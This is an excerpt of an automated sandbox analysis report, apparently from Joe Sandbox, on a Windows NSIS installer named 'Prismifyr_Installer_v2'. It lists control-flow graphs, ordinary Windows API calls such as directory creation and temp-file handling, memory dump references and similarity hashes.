                                                                                                                                                                                                                          control_flow_graph 788 401b77-401b82 789 401b84-401b87 788->789 790 401bc8-401bcb 788->790 791 4022e4-4022fc call 4062dc call 405920 789->791 792 401b8d-401b91 789->792 793 401bf2-401c08 GlobalAlloc call 4062dc 790->793 794 401bcd-401bcf 790->794 803 402ac5-402ace 791->803 811 402ad0-402ad4 791->811 792->789 797 401b93-401b95 792->797 800 401c0d-401c1a 793->800 798 401bd5-401bed call 4062ba GlobalFree 794->798 799 40288b-402892 794->799 797->791 802 401b9b-4029e6 call 4062ba * 3 797->802 798->803 799->803 800->803 802->803 803->811
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNELBASE(00736720), ref: 00401BE7
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                                                          • String ID: gs$ExecShellAsUser
                                                                                                                                                                                                                          • API String ID: 3394109436-3930729952
                                                                                                                                                                                                                          • Opcode ID: 0ee5b69d2cfb3a0a2e0f3aae0319e9b1983c649d140d642359d16bc307d41886
                                                                                                                                                                                                                          • Instruction ID: 2ffc4b8e8b305263ff1bfe934f744a2e7f0909984677ca7ca3d2d917788d1148
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee5b69d2cfb3a0a2e0f3aae0319e9b1983c649d140d642359d16bc307d41886
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52210A76600100ABCB10FF95CE8499E73A8EB48318BA4443FF506F32D0DB78A852DB6D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 818 4057f1-40583c CreateDirectoryW 819 405842-40584f GetLastError 818->819 820 40583e-405840 818->820 821 405869-40586b 819->821 822 405851-405865 SetFileSecurityW 819->822 820->821 822->820 823 405867 GetLastError 822->823 823->821
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3449924974-0
                                                                                                                                                                                                                          • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                          • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420,00000000), ref: 00405C48
                                                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420,00000000), ref: 00405CF0
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420), ref: 00405D00
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: C:\
                                                                                                                                                                                                                          • API String ID: 3248276644-3404278061
                                                                                                                                                                                                                          • Opcode ID: 1236b3014a845ece28ca986cac263987dd07c4e4a123605a37d0802bd6a8cdf3
                                                                                                                                                                                                                          • Instruction ID: 4e01e145a0ed536ad24acc563e8a85444835dd946e40d448b56664b374cc0476
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1236b3014a845ece28ca986cac263987dd07c4e4a123605a37d0802bd6a8cdf3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21F0F43500DF6125F626333A1C45AAF2555CE82328B6A057FFC62B12D2DA3C89539D7E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004CB000,0040338D,004DB000,004DF000,004DF000,004DF000,004DF000,004DF000,76233420,004035D9), ref: 00405E18
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                          • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004065FD: FindFirstFileW.KERNELBASE(004DF000,00468298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420), ref: 00406608
                                                                                                                                                                                                                            • Part of subcall function 004065FD: FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 00402299
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1486964399-0
                                                                                                                                                                                                                          • Opcode ID: 29d6f0bed4bd2d50b69dd1226e545e03bb95794d8620927361660d91590f24b0
                                                                                                                                                                                                                          • Instruction ID: edc96df04b91ed766a503f65766f364d086ea8d205cfe5bb15309c141496b913
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29d6f0bed4bd2d50b69dd1226e545e03bb95794d8620927361660d91590f24b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57117071900318A6DB10EFF98E4999EB7B8AF04344F50443FB805F72D1D6B8C4419B59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405D8B: GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                                                            • Part of subcall function 00405D8B: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DA4
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B66), ref: 0040599F
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000000,00405B66), ref: 004059A7
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1655745494-0
                                                                                                                                                                                                                          • Opcode ID: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
                                                                                                                                                                                                                          • Instruction ID: 825022a906987a8d14f11fb4079f6fb6242afe5a54bc5f1377d2c32e3c215ab4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E0E5B1119F5096D21067349A0CB5B2AA4DF86334F05093AF891F11C0DB3844068EBE
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420,00000000), ref: 00405C48
                                                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                            • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D3000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1892508949-0
                                                                                                                                                                                                                          • Opcode ID: 125bac33416d21a80fc522b842b933099275dd0dd1ea66691da55d5ffdcd1f5d
                                                                                                                                                                                                                          • Instruction ID: 536d45c59d08a7b21130d9dbd5b0e10796a041e4a40079992e14d28e29d42f71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 125bac33416d21a80fc522b842b933099275dd0dd1ea66691da55d5ffdcd1f5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211E231504505EBCF30AFA1CD0159F36A0EF14369B28493BFA45B22F1DB3E8A919B5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                          Memory Dump Source
